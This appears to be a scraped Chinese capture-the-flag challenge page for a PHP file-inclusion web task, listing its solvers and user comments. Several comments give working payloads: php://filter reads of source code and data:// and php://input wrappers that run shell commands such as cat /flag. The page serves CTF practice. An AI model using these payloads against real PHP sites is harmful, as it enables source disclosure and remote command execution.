简单的IncludeWEB 未解决
分数:
15
金币:
2
题目作者:
hanzkj
一 血:
flagOrz
一血奖励:
2金币
解 决:
278
提 示:
描 述:
听说你很会读文件?我把门(目录遍历)焊死了,窗户(关键词过滤)也封了。笔给你,你来写(payload)。
评分(0)
暂无评分
解题动态
19353442260 攻破了该题 1天前
TKar0 攻破了该题 2天前
ycm824632241 攻破了该题 3天前
ndzdb 攻破了该题 3天前
fubao2020 攻破了该题 6天前
acrock 攻破了该题 7天前
记得开心一点 攻破了该题 9天前
920917544 攻破了该题 9天前
树木有点绿 攻破了该题 14天前
木尘0000 攻破了该题 14天前
1520622465 攻破了该题 15天前
flymoon 攻破了该题 16天前
wintersss 攻破了该题 16天前
宋砚 攻破了该题 17天前
flay 攻破了该题 18天前
不会编程的崽 攻破了该题 18天前
testctffff 攻破了该题 19天前
chenfei123 攻破了该题 20天前
Kur0Ai1uro. 攻破了该题 21天前
评论
kitniu 1月前
举报
1.IP/?page=php://filter/read=convert.base64-encode/resource=index.php 2.IP/?page=data://text/plain,%3C?php%20system(%27cat%20/fla?%27)?%3E
网恋秀牛子被录屏导致自卑 4月前
举报
/?page=data://text/plain,<?=exec("cat /fla?")?>
shrinp 4月前
举报
php://filter/convert.base64-encode/resource获取源码-》查看WAF细节-》使用data://text/plain, <?php 你需要的命令?>即可
yinghui130 5月前
举报
POST /?page=php://input HTTP/1.1 &lt;br&gt; Host: 171.80.2.169:15133 &lt;br&gt; &lt;br&gt; &lt;?php system('tac /flag ');?&gt;
网恋秀牛子被录屏导致自卑 4月前
举报
@111222 这不是实体编码,是bugku不让发尖括号之类的符号,自动把评论替换成实体编码了
111222 5月前
举报
谢谢你的思路,不过我用burp试了一下这里不用实体编码似乎也可以过
Jazz888 5月前
举报
flag{**********}
wywitkey 5月前
举报
解题思路是伪协议,先期php://filter/读源码,后期data://text/plain,读flag